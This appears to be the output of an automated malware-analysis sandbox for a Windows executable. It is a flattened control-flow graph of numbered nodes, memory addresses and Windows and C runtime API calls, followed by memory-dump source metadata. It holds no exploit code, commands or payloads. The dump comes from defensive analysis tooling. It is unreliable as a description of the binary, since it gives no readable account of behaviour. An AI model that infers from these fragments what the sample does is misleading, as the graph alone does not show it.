RaiseException 10948->10953 10951->10948 10952->10951 10954 7ff6b297e7f9 10953->10954 10954->10948 10516 7ff6b2980fd5 10517 7ff6b2981004 10516->10517 10518 7ff6b2980ff1 10516->10518 10520 7ff6b29800d0 15 API calls 10517->10520 10522 7ff6b29800d0 10518->10522 10521 7ff6b2981193 10520->10521 10521->10521 10523 7ff6b29800e9 10522->10523 10524 7ff6b29801f4 10523->10524 10525 7ff6b2980124 10523->10525 10531 7ff6b2983b40 5 API calls 10524->10531 10526 7ff6b2980190 10525->10526 10529 7ff6b2980138 10525->10529 10527 7ff6b298019f 10526->10527 10528 7ff6b2980194 strlen 10526->10528 10551 7ff6b297ff50 10527->10551 10528->10527 10530 7ff6b2980214 strlen 10529->10530 10533 7ff6b2980140 10529->10533 10530->10533 10532 7ff6b298020b 10531->10532 10532->10517 10542 7ff6b297f7c0 10533->10542 10538 7ff6b2980157 10540 7ff6b2983b40 5 API calls 10538->10540 10541 7ff6b2980182 10540->10541 10541->10517 10544 7ff6b297f7e2 10542->10544 10543 7ff6b297f972 10545 7ff6b297f6c0 8 API calls 10543->10545 10549 7ff6b297f991 10543->10549 10544->10543 10546 7ff6b297f85b 10544->10546 10547 7ff6b297fa70 10544->10547 10545->10549 10546->10543 10550 7ff6b297f3e0 2 API calls 10546->10550 10548 7ff6b297f6c0 8 API calls 10547->10548 10547->10549 10548->10549 10549->10538 10550->10546 10552 7ff6b297ff86 10551->10552 10553 7ff6b297f7c0 8 API calls 10552->10553 10554 7ff6b297fff1 10553->10554 10555 7ff6b297ddd5 10556 7ff6b297ddf9 10555->10556 10557 7ff6b297de04 10555->10557 10557->10556 10558 7ff6b297de1b EnterCriticalSection LeaveCriticalSection 10557->10558 10559 7ff6b29733d0 wcslen 10560 7ff6b297347c 10559->10560 10561 7ff6b29734c3 10560->10561 10562 7ff6b2973480 wcslen 10560->10562 10562->10561 10955 7ff6b29714d0 10956 7ff6b2971180 84 API calls 10955->10956 10957 7ff6b29714e6 10956->10957 10958 7ff6b2972cd0 10959 7ff6b2972ba0 4 API calls 10958->10959 10960 7ff6b2972d02 10959->10960 10964 7ff6b297e4d0 TlsFree 10965 7ff6b297e4e8 GetLastError 10964->10965 10966 7ff6b297e4de 10964->10966 10563 7ff6b2978a25 
10566 7ff6b2978a40 10563->10566 10567 7ff6b297a284 10566->10567 10568 7ff6b29746e0 10566->10568 10571 7ff6b297f250 10568->10571 10574 7ff6b2980b20 _errno 10571->10574 10573 7ff6b2974704 strlen 10573->10566 10575 7ff6b2980bc4 10574->10575 10575->10573 10967 7ff6b2986721 TlsGetValue 10576 7ff6b2987c20 10577 7ff6b2987c36 10576->10577 10579 7ff6b2987c82 10577->10579 10580 7ff6b2987d70 10577->10580 10581 7ff6b2987da2 10580->10581 10582 7ff6b2987d7e 10580->10582 10581->10577 10582->10581 10583 7ff6b2987d89 strcmp 10582->10583 10583->10581 10584 7ff6b297e420 10585 7ff6b297e439 10584->10585 10586 7ff6b297e42e 10584->10586 10586->10585 10587 7ff6b297e460 Sleep 10586->10587 10587->10585 10587->10587 10971 7ff6b2973930 10974 7ff6b2972ed0 10971->10974 10973 7ff6b2973946 10975 7ff6b2972ba0 4 API calls 10974->10975 10976 7ff6b2972f02 10975->10976 10976->10973 10588 7ff6b2987a30 10589 7ff6b2987a80 10588->10589 10592 7ff6b2987a55 10588->10592 10591 7ff6b2987d70 strcmp 10589->10591 10590 7ff6b2987d70 strcmp 10593 7ff6b2987a5d 10590->10593 10591->10592 10592->10590 10594 7ff6b2987a98 10592->10594 10977 7ff6b297e530 TlsSetValue 10978 7ff6b297e548 GetLastError 10977->10978 10979 7ff6b297e53e 10977->10979 10980 7ff6b2981130 10981 7ff6b2980d0c 10980->10981 10982 7ff6b2981145 10980->10982 10983 7ff6b297fba0 13 API calls 10981->10983 10984 7ff6b297fba0 13 API calls 10982->10984 10986 7ff6b2980bc4 10983->10986 10985 7ff6b298115f 10984->10985 10987 7ff6b2980f30 10988 7ff6b2980f4c 10987->10988 10989 7ff6b298110a 10987->10989 10988->10989 10990 7ff6b2980030 13 API calls 10988->10990 10991 7ff6b2980030 13 API calls 10989->10991 10990->10988 10992 7ff6b2981124 10991->10992 10992->10992 10993 7ff6b29834fd strerror 10994 7ff6b2981e60 strlen 10993->10994 10995 7ff6b2983511 10994->10995 10995->10995 10595 7ff6b2978c05 10596 7ff6b2977e20 10595->10596 10603 7ff6b2978c12 10595->10603 10597 7ff6b297aa56 10605 7ff6b2974830 strlen 10597->10605 10598 7ff6b2978c64 strcmp 10598->10603 10600 7ff6b297aa94 
10601 7ff6b2978c9d strcmp 10602 7ff6b2978cbf strcmp 10601->10602 10601->10603 10602->10603 10604 7ff6b297aee7 10602->10604 10603->10596 10603->10597 10603->10598 10603->10601 10604->10604 10606 7ff6b297484b 10605->10606 10606->10600 10999 7ff6b297e500 GetLastError TlsGetValue SetLastError 11000 7ff6b2986b00 11001 7ff6b2986b36 11000->11001 11004 7ff6b2986b0a 11000->11004 11002 7ff6b2986ca0 16 API calls 11001->11002 11002->11004 11003 7ff6b2986b30 11004->11003 11005 7ff6b2987410 16 API calls 11004->11005 11006 7ff6b2988428 11005->11006 11007 7ff6b2987700 11008 7ff6b2987806 11007->11008 11009 7ff6b2987714 11007->11009 11010 7ff6b2987811 fwrite abort 11008->11010 11014 7ff6b2988150 16 API calls 11008->11014 11017 7ff6b2987801 abort 11008->11017 11018 7ff6b2988330 16 API calls 11008->11018 11022 7ff6b2987851 fwrite 11008->11022 11011 7ff6b29877dc fwrite 11009->11011 11012 7ff6b2987729 11009->11012 11010->11008 11011->11017 11031 7ff6b297d110 11012->11031 11014->11008 11017->11008 11018->11008 11020 7ff6b2987797 11023 7ff6b29877cf fputs 11020->11023 11026 7ff6b298779e fwrite 11020->11026 11030 7ff6b29884d0 16 API calls 11020->11030 11021 7ff6b298778a fputs 11021->11020 11025 7ff6b2987872 fputs 11022->11025 11023->11020 11027 7ff6b2987884 fputc 11025->11027 11026->11020 11028 7ff6b29877c0 free 11026->11028 11029 7ff6b2988330 16 API calls 11027->11029 11028->11020 11029->11008 11030->11020 11032 7ff6b297d12c 11031->11032 11038 7ff6b297d1be fwrite 11031->11038 11032->11038 11041 7ff6b297c2f0 11032->11041 11034 7ff6b297d165 11035 7ff6b297d16d 11034->11035 11036 7ff6b297d240 free 11034->11036 11037 7ff6b297d192 strlen 11035->11037 11035->11038 11036->11038 11039 7ff6b297d1a4 memcpy free 11037->11039 11040 7ff6b297d220 free 11037->11040 11038->11020 11038->11021 11039->11038 11040->11038 11042 7ff6b297c321 strncmp 11041->11042 11046 7ff6b297c341 11041->11046 11042->11046 11043 7ff6b297c43b strlen 11044 7ff6b297c72d 11043->11044 11043->11046 11044->11034 11045 7ff6b297c3a1 
strlen 11045->11046 11046->11042 11046->11043 11046->11044 11046->11045 11047 7ff6b297c403 strlen 11046->11047 11047->11046 11048 7ff6b2986709 VirtualQuery 11049 7ff6b2995354 11048->11049 10607 7ff6b2971010 10609 7ff6b297104b 10607->10609 10608 7ff6b297106d __set_app_type 10610 7ff6b2971077 10608->10610 10609->10608 10609->10610 10611 7ff6b2974610 10612 7ff6b2974670 10611->10612 10616 7ff6b2974637 10611->10616 10613 7ff6b2974661 10612->10613 10615 7ff6b2974688 realloc 10612->10615 10614 7ff6b297463e memcpy 10614->10613 10615->10616 10617 7ff6b29746b5 free 10615->10617 10616->10613 10616->10614 10617->10613 11050 7ff6b2983311 11051 7ff6b29833c4 11050->11051 11054 7ff6b2983338 11050->11054 11053 7ff6b2983839 11051->11053 11055 7ff6b29839c5 11051->11055 11052 7ff6b29817e0 10 API calls 11052->11053 11053->11052 11054->11053 11054->11055 11056 7ff6b2983a47 11054->11056 11061 7ff6b2982650 11054->11061 11057 7ff6b29817e0 10 API calls 11055->11057 11058 7ff6b29817e0 10 API calls 11056->11058 11057->11056 11060 7ff6b2983a74 11058->11060 11060->11060 11063 7ff6b298266f 11061->11063 11062 7ff6b2982776 11062->11051 11063->11062 11064 7ff6b2981880 7 API calls 11063->11064 11065 7ff6b2981900 2 API calls 11063->11065 11064->11063 11065->11063 11069 7ff6b2987d10 11070 7ff6b2987d42 11069->11070 11071 7ff6b2987d1e 11069->11071 11071->11070 11072 7ff6b2987d29 strcmp 11071->11072 11072->11070 10618 7ff6b297e810 10619 7ff6b297e819 10618->10619 10620 7ff6b297e826 abort 10618->10620 11073 7ff6b2981310 11074 7ff6b2981319 localeconv 11073->11074 11075 7ff6b29811b1 11073->11075 11076 7ff6b29863e0 6 API calls 11074->11076 11077 7ff6b2981353 11076->11077 11078 7ff6b2987b10 11079 7ff6b2987d70 strcmp 11078->11079 11080 7ff6b2987b54 11079->11080 11081 7ff6b2987d70 strcmp 11080->11081 11082 7ff6b2987b61 11080->11082 11081->11082 10621 7ff6b2981164 10622 7ff6b2981004 10621->10622 10623 7ff6b2980ff1 10621->10623 10625 7ff6b29800d0 15 API calls 10622->10625 10624 7ff6b29800d0 15 API calls 
10623->10624 10624->10622 10626 7ff6b2981193 10625->10626 10626->10626 11083 7ff6b2974a60 11084 7ff6b29746e0 _errno 11083->11084 11085 7ff6b2974a82 strlen 11084->11085 11086 7ff6b2974a8f 11085->11086 10627 7ff6b2978160 10628 7ff6b297816e 10627->10628 10629 7ff6b2974830 strlen 10628->10629 10630 7ff6b297817d 10629->10630 10631 7ff6b2974830 strlen 10630->10631 10632 7ff6b297a5d9 10631->10632 10633 7ff6b29746e0 _errno 10632->10633 10634 7ff6b297a5f4 strlen 10633->10634 10637 7ff6b297a604 10634->10637 10635 7ff6b2974830 strlen 10636 7ff6b297a678 10635->10636 10637->10635 10638 7ff6b2986560 ___mb_cur_max_func ___lc_codepage_func 10639 7ff6b2986270 4 API calls 10638->10639 10640 7ff6b29865ad 10639->10640 11087 7ff6b2980c60 11088 7ff6b2980c77 11087->11088 11089 7ff6b2980d85 11087->11089 11095 7ff6b2980bc4 11088->11095 11096 7ff6b297f5d0 11088->11096 11091 7ff6b2980da6 11089->11091 11092 7ff6b2981542 wcslen 11089->11092 11093 7ff6b297f3e0 2 API calls 11091->11093 11094 7ff6b2980dbe 11093->11094 11097 7ff6b297f5f5 11096->11097 11098 7ff6b297f610 strlen 11096->11098 11097->11098 11098->11097 11099 7ff6b297de60 11100 7ff6b297de71 11099->11100 11101 7ff6b297de80 EnterCriticalSection 11099->11101 11102 7ff6b297deb3 LeaveCriticalSection 11101->11102 11105 7ff6b297de99 11101->11105 11103 7ff6b297dec0 11102->11103 11105->11102 11106 7ff6b297de9f free LeaveCriticalSection 11105->11106 11106->11103 10641 7ff6b2986769 RtlCaptureContext 10645 7ff6b2986170 ___lc_codepage_func ___mb_cur_max_func 10646 7ff6b29861aa 10645->10646 10647 7ff6b29861a0 10645->10647 10648 7ff6b29861a5 10647->10648 10651 7ff6b2986200 10647->10651 10648->10646 10649 7ff6b29860b0 2 API calls 10648->10649 10649->10648 10650 7ff6b29860b0 2 API calls 10650->10651 10651->10646 10651->10650 10652 7ff6b2985570 10653 7ff6b2985585 10652->10653 10654 7ff6b2985590 DeleteCriticalSection 10652->10654 11110 7ff6b297d270 11111 7ff6b297d279 11110->11111 11112 7ff6b297d283 11110->11112 11111->11112 11113 7ff6b297c2f0 4 API calls 
11111->11113 11113->11112 10655 7ff6b298356e 10656 7ff6b2981900 2 API calls 10655->10656 10657 7ff6b298358b 10656->10657 10657->10657 10662 7ff6b2986741 SetUnhandledExceptionFilter 11114 7ff6b2973a40 11115 7ff6b2972ed0 4 API calls 11114->11115 11116 7ff6b2973a61 11115->11116 11120 7ff6b2973b37 11116->11120 11121 7ff6b2971720 11116->11121 11118 7ff6b2973ba2 11118->11120 11137 7ff6b2973810 11118->11137 11126 7ff6b29717a0 11121->11126 11122 7ff6b2971e30 11123 7ff6b2971e50 wcslen 11122->11123 11125 7ff6b2971e80 11123->11125 11124 7ff6b297190c wcsncmp 11124->11126 11126->11122 11126->11124 11127 7ff6b297198e 11126->11127 11127->11125 11128 7ff6b29719e1 memset 11127->11128 11129 7ff6b2971a1c 11128->11129 11130 7ff6b2971a9f wcscpy wcscat wcslen 11129->11130 11131 7ff6b2971e08 11130->11131 11132 7ff6b2971ad2 wcslen 11130->11132 11133 7ff6b2971af6 wcslen 11131->11133 11134 7ff6b2971b07 11131->11134 11132->11133 11132->11134 11133->11134 11134->11123 11135 7ff6b2971b2e wcslen wcslen 11134->11135 11136 7ff6b2971bd6 11135->11136 11136->11118 11138 7ff6b2973824 11137->11138 11143 7ff6b2973750 memset 11138->11143 11140 7ff6b2973851 11142 7ff6b2973855 11140->11142 11145 7ff6b29737c0 memset 11140->11145 11142->11120 11144 7ff6b2973789 11143->11144 11144->11140 11146 7ff6b29737f7 11145->11146 11146->11142 10663 7ff6b297e740 10664 7ff6b297e74a 10663->10664 10665 7ff6b297e758 10663->10665 10665->10664 10666 7ff6b297e765 ReleaseSemaphore 10665->10666 10666->10664 10667 7ff6b2983d40 10668 7ff6b29856c0 5 API calls 10667->10668 10669 7ff6b2983d48 10668->10669 10670 7ff6b2983ab0 6 API calls 10669->10670 10671 7ff6b2983d70 10670->10671 11147 7ff6b297d440 11148 7ff6b297d45f 11147->11148 11149 7ff6b297d496 fprintf 11148->11149 11150 7ff6b2988040 11151 7ff6b2988054 malloc 11150->11151 11152 7ff6b2988061 11151->11152 11154 7ff6b2988067 11151->11154 11153 7ff6b2988075 11155 7ff6b2988100 16 API calls 11153->11155 11154->11151 11154->11153 11156 7ff6b298807f 11155->11156 11157 7ff6b2988520 16 API 
calls 11156->11157 11158 7ff6b29880a3 malloc 11157->11158 11159 7ff6b29880dd 11158->11159 11160 7ff6b29880c7 11158->11160 11161 7ff6b2987570 16 API calls 11159->11161 11162 7ff6b29880e7 11161->11162 11162->11160 11163 7ff6b2987ff0 16 API calls 11162->11163 11164 7ff6b29880f4 11163->11164 11165 7ff6b297e640 CreateSemaphoreW 10672 7ff6b2983154 10673 7ff6b298317b 10672->10673 10674 7ff6b2983760 10672->10674 10683 7ff6b2981fb0 10673->10683 10676 7ff6b2981fb0 18 API calls 10674->10676 10677 7ff6b298377a 10676->10677 10677->10677 10678 7ff6b29830e4 10679 7ff6b29835a7 10678->10679 10680 7ff6b2981650 10 API calls 10678->10680 10681 7ff6b2981900 2 API calls 10679->10681 10680->10678 10682 7ff6b29835c8 10681->10682 10684 7ff6b2981fc4 10683->10684 10685 7ff6b2982004 10684->10685 10686 7ff6b2982040 10684->10686 10688 7ff6b2981a80 9 API calls 10685->10688 10687 7ff6b29817e0 10 API calls 10686->10687 10689 7ff6b298204f 10687->10689 10690 7ff6b2982013 10688->10690 10691 7ff6b2983b40 5 API calls 10689->10691 10693 7ff6b2983b40 5 API calls 10690->10693 10692 7ff6b2982057 10691->10692 10692->10678 10694 7ff6b2982037 10693->10694 10694->10678 11166 7ff6b2973650 wcslen 11167 7ff6b29736be 11166->11167 10695 7ff6b2987950 10696 7ff6b2987d70 strcmp 10695->10696 10697 7ff6b2987969 10696->10697 11168 7ff6b2986450 ___lc_codepage_func ___mb_cur_max_func 11169 7ff6b2986491 11168->11169 11174 7ff6b29864a9 11168->11174 11170 7ff6b29864a2 11169->11170 11171 7ff6b2986510 11169->11171 11169->11174 11173 7ff6b2986270 4 API calls 11170->11173 11170->11174 11172 7ff6b2986270 4 API calls 11171->11172 11171->11174 11172->11171 11173->11170 11175 7ff6b2981050 11176 7ff6b2981059 11175->11176 11177 7ff6b297f5d0 strlen 11176->11177 11178 7ff6b2981064 11177->11178 11178->11178 11179 7ff6b2978a9d 11180 7ff6b2978ab8 11179->11180 11181 7ff6b29746e0 _errno 11180->11181 11182 7ff6b2979e34 strlen 11181->11182 11186 7ff6b2979e48 11182->11186 11183 7ff6b297a284 11184 7ff6b29746e0 _errno 11185 7ff6b2979ef3 strlen 
11184->11185 11185->11186 11186->11183 11186->11184 11187 7ff6b2985ea0 11188 7ff6b29855c0 6 API calls 11187->11188 11189 7ff6b2985ebc 11188->11189 10698 7ff6b29831aa 10699 7ff6b2983603 10698->10699 10702 7ff6b29831b8 10698->10702 10700 7ff6b2981900 2 API calls 10699->10700 10699->10702 10701 7ff6b2983623 10700->10701 11190 7ff6b29878aa 11191 7ff6b2988330 16 API calls 11190->11191 11192 7ff6b29878b2 11191->11192 11195 7ff6b297eb70 RtlCaptureContext RtlUnwindEx abort 11192->11195 10703 7ff6b29867a9 GetLastError 10000 7ff6b29714b0 10003 7ff6b2971180 10000->10003 10002 7ff6b29714c6 10004 7ff6b29711b4 10003->10004 10005 7ff6b2971450 GetStartupInfoA 10003->10005 10006 7ff6b29711dc Sleep 10004->10006 10010 7ff6b29711f1 10004->10010 10007 7ff6b2971395 10005->10007 10006->10004 10007->10002 10008 7ff6b297141c _initterm 10009 7ff6b2971224 10008->10009 10020 7ff6b297d7c0 10009->10020 10010->10007 10010->10008 10010->10009 10012 7ff6b297124c SetUnhandledExceptionFilter 10013 7ff6b297126f 10012->10013 10014 7ff6b29712f3 malloc 10013->10014 10015 7ff6b297135c 10014->10015 10016 7ff6b297131a strlen malloc memcpy 10014->10016 10042 7ff6b29885d0 10015->10042 10018 7ff6b2971357 10016->10018 10018->10015 10021 7ff6b297d7e2 10020->10021 10023 7ff6b297d7f3 10020->10023 10021->10012 10022 7ff6b297daa2 10022->10021 10024 7ff6b297daab 10022->10024 10023->10021 10023->10022 10038 7ff6b297d86b 10023->10038 10025 7ff6b297d5c0 8 API calls 10024->10025 10028 7ff6b297daf5 10024->10028 10025->10024 10026 7ff6b297db22 10027 7ff6b297d550 8 API calls 10026->10027 10030 7ff6b297db2e 10027->10030 10125 7ff6b297d550 10028->10125 10030->10012 10031 7ff6b297d5c0 8 API calls 10036 7ff6b297d8c1 10031->10036 10032 7ff6b297db0e 10034 7ff6b297d550 8 API calls 10032->10034 10033 7ff6b297da8c 10035 7ff6b297d5c0 8 API calls 10033->10035 10034->10026 10037 7ff6b297da9d 10035->10037 10036->10031 10036->10038 10040 7ff6b297d943 10036->10040 10094 7ff6b297d5c0 10036->10094 10037->10012 10038->10021 10038->10026 
10038->10028 10038->10032 10038->10033 10038->10036 10038->10040 10040->10021 10041 7ff6b297d972 VirtualProtect 10040->10041 10041->10040 10043 7ff6b29885e6 10042->10043 10044 7ff6b2989b74 10043->10044 10045 7ff6b29886fc wcslen 10043->10045 10046 7ff6b2988763 10045->10046 10047 7ff6b298888c memset 10046->10047 10048 7ff6b29888da 10047->10048 10155 7ff6b2972b30 wcslen 10048->10155 10050 7ff6b2988a0a 10160 7ff6b2972b00 10050->10160 10052 7ff6b2988a26 memset 10053 7ff6b2988a5e 10052->10053 10054 7ff6b2972b00 wcscat 10053->10054 10055 7ff6b2988ae2 memset 10054->10055 10056 7ff6b2988b73 10055->10056 10057 7ff6b2972b00 wcscat 10056->10057 10058 7ff6b2988c86 memset 10057->10058 10059 7ff6b2988ccb 10058->10059 10060 7ff6b2972b30 3 API calls 10059->10060 10061 7ff6b2988e24 10060->10061 10062 7ff6b2972b00 wcscat 10061->10062 10063 7ff6b2988e40 memset 10062->10063 10064 7ff6b2988e85 10063->10064 10064->10044 10065 7ff6b2972b30 3 API calls 10064->10065 10066 7ff6b2988fa3 10065->10066 10067 7ff6b2972b00 wcscat 10066->10067 10068 7ff6b2988fb5 memset 10067->10068 10069 7ff6b2988ff8 10068->10069 10070 7ff6b2972b00 wcscat 10069->10070 10071 7ff6b298907e memset 10070->10071 10072 7ff6b29890d0 10071->10072 10073 7ff6b2972b00 wcscat 10072->10073 10074 7ff6b2989181 10073->10074 10164 7ff6b2971ea0 10074->10164 10076 7ff6b2989186 10178 7ff6b2973010 10076->10178 10078 7ff6b2989410 _wcsicmp 10093 7ff6b2989356 10078->10093 10081 7ff6b2989703 memcpy 10083 7ff6b2989724 memcpy 10081->10083 10081->10093 10082 7ff6b2989458 memcpy 10084 7ff6b2989479 memcpy 10082->10084 10082->10093 10083->10093 10084->10093 10086 7ff6b2972990 13 API calls 10086->10093 10087 7ff6b29898cc memcpy 10088 7ff6b29898ed memcpy 10087->10088 10087->10093 10088->10093 10089 7ff6b2989b58 10090 7ff6b29731c0 24 API calls 10089->10090 10090->10044 10091 7ff6b2989b41 10189 7ff6b29731c0 10091->10189 10093->10078 10093->10081 10093->10082 10093->10086 10093->10087 10093->10089 10093->10091 10181 7ff6b2973310 10093->10181 10184 
7ff6b2972a50 10093->10184 10187 7ff6b29734f0 wcslen 10093->10187 10095 7ff6b297d750 10094->10095 10097 7ff6b297d5e2 10094->10097 10095->10038 10096 7ff6b297d68e 10096->10038 10096->10096 10097->10096 10098 7ff6b297d7a2 10097->10098 10100 7ff6b297d64c VirtualQuery 10097->10100 10099 7ff6b297d550 4 API calls 10098->10099 10108 7ff6b297d7b1 10099->10108 10101 7ff6b297d67a 10100->10101 10102 7ff6b297d785 10100->10102 10101->10096 10105 7ff6b297d700 VirtualProtect 10101->10105 10102->10098 10104 7ff6b297d550 4 API calls 10102->10104 10103 7ff6b297d7e2 10103->10038 10104->10098 10105->10096 10106 7ff6b297d73c GetLastError 10105->10106 10106->10095 10107 7ff6b297d550 4 API calls 10106->10107 10107->10095 10108->10103 10111 7ff6b297daa2 10108->10111 10120 7ff6b297d86b 10108->10120 10109 7ff6b297d5c0 4 API calls 10109->10111 10110 7ff6b297db22 10112 7ff6b297d550 4 API calls 10110->10112 10111->10103 10111->10109 10113 7ff6b297daf5 10111->10113 10115 7ff6b297db2e 10112->10115 10114 7ff6b297d550 4 API calls 10113->10114 10116 7ff6b297db0e 10114->10116 10115->10038 10118 7ff6b297d550 4 API calls 10116->10118 10117 7ff6b297da8c 10119 7ff6b297d5c0 4 API calls 10117->10119 10118->10110 10121 7ff6b297da9d 10119->10121 10120->10103 10120->10110 10120->10113 10120->10116 10120->10117 10122 7ff6b297d943 10120->10122 10123 7ff6b297d5c0 VirtualQuery VirtualProtect GetLastError VirtualProtect 10120->10123 10121->10038 10122->10103 10124 7ff6b297d972 VirtualProtect 10122->10124 10123->10120 10124->10122 10126 7ff6b297d57c 10125->10126 10127 7ff6b297d7a2 10126->10127 10128 7ff6b297d68e 10126->10128 10130 7ff6b297d64c VirtualQuery 10126->10130 10129 7ff6b297d550 4 API calls 10127->10129 10128->10032 10138 7ff6b297d7b1 10129->10138 10131 7ff6b297d67a 10130->10131 10132 7ff6b297d785 10130->10132 10131->10128 10135 7ff6b297d700 VirtualProtect 10131->10135 10132->10127 10134 7ff6b297d550 4 API calls 10132->10134 10133 7ff6b297d7e2 10133->10032 10134->10127 10135->10128 10136 7ff6b297d73c 
GetLastError 10135->10136 10136->10128 10137 7ff6b297d550 4 API calls 10136->10137 10137->10128 10138->10133 10141 7ff6b297daa2 10138->10141 10151 7ff6b297d86b 10138->10151 10139 7ff6b297d5c0 4 API calls 10139->10141 10140 7ff6b297db22 10142 7ff6b297d550 4 API calls 10140->10142 10141->10133 10141->10139 10143 7ff6b297daf5 10141->10143 10145 7ff6b297db2e 10142->10145 10144 7ff6b297d550 4 API calls 10143->10144 10147 7ff6b297db0e 10144->10147 10145->10032 10146 7ff6b297d5c0 VirtualQuery VirtualProtect GetLastError VirtualProtect 10146->10151 10149 7ff6b297d550 4 API calls 10147->10149 10148 7ff6b297da8c 10150 7ff6b297d5c0 4 API calls 10148->10150 10149->10140 10152 7ff6b297da9d 10150->10152 10151->10133 10151->10140 10151->10143 10151->10146 10151->10147 10151->10148 10153 7ff6b297d943 10151->10153 10152->10032 10153->10133 10154 7ff6b297d972 VirtualProtect 10153->10154 10154->10153 10156 7ff6b2972b63 _wcsnicmp 10155->10156 10157 7ff6b2972b4e 10155->10157 10158 7ff6b2972b75 10156->10158 10159 7ff6b2972b50 wcslen 10156->10159 10157->10050 10158->10050 10159->10156 10159->10157 10161 7ff6b2972b11 10160->10161 10162 7ff6b29866d8 wcscat 10161->10162 10162->10052 10163 7ff6b2995483 10162->10163 10165 7ff6b2971f0f 10164->10165 10166 7ff6b2971f18 memcpy 10165->10166 10167 7ff6b2971f43 10165->10167 10166->10167 10168 7ff6b297208d wcslen memcpy 10167->10168 10169 7ff6b29720bd memcpy 10168->10169 10170 7ff6b29720e8 10168->10170 10169->10170 10171 7ff6b297233c wcslen 10170->10171 10177 7ff6b2972377 10171->10177 10172 7ff6b2972686 _wcsnicmp 10174 7ff6b297291f 10172->10174 10172->10177 10173 7ff6b297270c _wcsnicmp 10173->10174 10173->10177 10174->10076 10175 7ff6b2972792 _wcsnicmp 10175->10174 10175->10177 10176 7ff6b29728fc wcsstr 10176->10174 10176->10177 10177->10172 10177->10173 10177->10174 10177->10175 10177->10176 10194 7ff6b2972ba0 memset 10178->10194 10180 7ff6b297304c 10180->10093 10182 7ff6b2972ba0 4 API calls 10181->10182 10183 7ff6b297333c 10182->10183 10183->10093 
10185 7ff6b2972a64 wcslen 10184->10185 10186 7ff6b2972ad0 10184->10186 10185->10186 10186->10093 10188 7ff6b297355c 10187->10188 10188->10093 10197 7ff6b2972d70 wcslen 10189->10197 10192 7ff6b2972ba0 4 API calls 10193 7ff6b2973203 10192->10193 10193->10089 10195 7ff6b2972be8 10194->10195 10196 7ff6b2972c68 wcscpy wcscat wcslen 10195->10196 10196->10180 10198 7ff6b2972ea6 10197->10198 10199 7ff6b2972da9 10197->10199 10201 7ff6b2972e92 10198->10201 10205 7ff6b2989d10 10198->10205 10199->10201 10202 7ff6b2972df5 wcscpy 10199->10202 10201->10192 10204 7ff6b2972ba0 4 API calls 10202->10204 10204->10199 10212 7ff6b2988100 malloc 10205->10212 10209 7ff6b2989d42 10210 7ff6b2989d61 malloc 10209->10210 10229 7ff6b297e560 CreateSemaphoreW 10209->10229 10210->10209 10213 7ff6b298811d 10212->10213 10214 7ff6b2988138 10212->10214 10219 7ff6b2988520 10213->10219 10230 7ff6b2987570 10214->10230 10220 7ff6b2988535 10219->10220 10292 7ff6b297eb20 RaiseException 10220->10292 10222 7ff6b2988559 10223 7ff6b2988150 16 API calls 10222->10223 10224 7ff6b2988561 10223->10224 10225 7ff6b2987ff0 16 API calls 10224->10225 10226 7ff6b2988566 10225->10226 10293 7ff6b297e900 10226->10293 10229->10209 10238 7ff6b298758a 10230->10238 10231 7ff6b29875f6 10231->10213 10239 7ff6b2987ff0 10231->10239 10233 7ff6b298766c 10253 7ff6b29878c0 10233->10253 10238->10231 10238->10233 10242 7ff6b297e610 10238->10242 10245 7ff6b29878f0 10238->10245 10250 7ff6b297e5a0 10238->10250 10258 7ff6b2986ca0 10239->10258 10243 7ff6b297e639 10242->10243 10244 7ff6b297e61f ReleaseSemaphore 10242->10244 10243->10238 10244->10243 10246 7ff6b2988100 16 API calls 10245->10246 10247 7ff6b29878fe 10246->10247 10248 7ff6b2988520 16 API calls 10247->10248 10249 7ff6b298791e 10248->10249 10249->10238 10251 7ff6b297e5c0 WaitForSingleObject 10250->10251 10252 7ff6b297e5ae 10250->10252 10251->10252 10252->10238 10254 7ff6b2988100 16 API calls 10253->10254 10255 7ff6b29878ce 10254->10255 10256 7ff6b2988520 16 API calls 10255->10256 
10257 7ff6b29878ee 10256->10257 10259 7ff6b2986ca6 abort 10258->10259 10262 7ff6b2988150 10259->10262 10264 7ff6b298815d 10262->10264 10263 7ff6b2986cb3 abort 10264->10263 10265 7ff6b2987ff0 16 API calls 10264->10265 10266 7ff6b29881cd 10265->10266 10267 7ff6b29881e2 10266->10267 10268 7ff6b2988150 16 API calls 10266->10268 10269 7ff6b2987ff0 16 API calls 10267->10269 10270 7ff6b29881fa 10267->10270 10268->10267 10269->10270 10271 7ff6b2986ca0 16 API calls 10270->10271 10272 7ff6b2988203 10271->10272 10273 7ff6b2988150 16 API calls 10272->10273 10274 7ff6b2988222 10273->10274 10288 7ff6b2986cc0 10274->10288 10289 7ff6b2986cc6 10288->10289 10290 7ff6b2987ff0 16 API calls 10289->10290 10291 7ff6b2986ccb 10290->10291 10292->10222 10294 7ff6b297e9ea 10293->10294 10297 7ff6b297e92a 10293->10297 10294->10209 10295 7ff6b297e9e0 10295->10294 10296 7ff6b297eaf8 RtlUnwindEx abort 10295->10296 10297->10294 10297->10295 10299 7ff6b297ea50 10297->10299 10300 7ff6b297e97b 10297->10300 10298 7ff6b297e9d4 abort 10298->10295 10299->10294 10299->10298 10302 7ff6b297eaa6 RtlUnwindEx 10299->10302 10300->10294 10300->10298 10301 7ff6b297e9a3 RaiseException 10300->10301 10301->10298 10302->10298 10704 7ff6b297d3b0 10705 7ff6b297d3c2 10704->10705 10707 7ff6b297d3d2 10705->10707 10709 7ff6b297df00 10705->10709 10708 7ff6b297d417 10710 7ff6b297dfa5 10709->10710 10714 7ff6b297df0e 10709->10714 10711 7ff6b297dfe0 InitializeCriticalSection 10710->10711 10712 7ff6b297dfaf 10710->10712 10711->10712 10712->10708 10713 7ff6b297df12 10713->10708 10714->10713 10715 7ff6b297df81 DeleteCriticalSection 10714->10715 10716 7ff6b297df70 free 10714->10716 10715->10713 10716->10715 10716->10716 11201 7ff6b297e8b0 RtlLookupFunctionEntry 11202 7ff6b297e8c7 11201->11202 10717 7ff6b2986779 RaiseException 10718 7ff6b29952e4 10717->10718 11203 7ff6b2983477 11204 7ff6b298349e 11203->11204 11208 7ff6b29834b1 11203->11208 11209 7ff6b29824e0 11204->11209 11205 7ff6b29824e0 20 API calls 11207 7ff6b29837b8 

                                                                                        Control-flow Graph
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.4478742287.00007FF6B2971000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6B2970000, based on PE: true
                                                                                        • Associated: 0000000A.00000002.4478720271.00007FF6B2970000.00000002.00000001.01000000.00000000.sdmp
